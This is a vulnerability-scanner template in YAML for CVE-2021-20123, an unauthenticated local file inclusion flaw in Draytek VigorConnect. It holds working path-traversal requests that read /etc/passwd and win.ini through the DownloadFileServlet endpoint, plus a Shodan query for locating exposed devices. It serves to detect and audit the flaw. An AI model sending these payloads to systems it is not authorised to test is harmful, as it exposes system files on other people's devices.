id: CVE-2021-20123

info:
  name: Draytek VigorConnect 1.6.0-B - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
  reference:
    - https://www.tenable.com/security/research/tra-2021-42
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20123
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-20123
    cwe-id: CWE-668
  metadata:
    verified: true
    shodan-query: http.html:"VigorConnect"
  tags: cve,cve2021,draytek,lfi,vigorconnect

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything"
      - "{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "for 16-bit app support"
        condition: or

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/06/27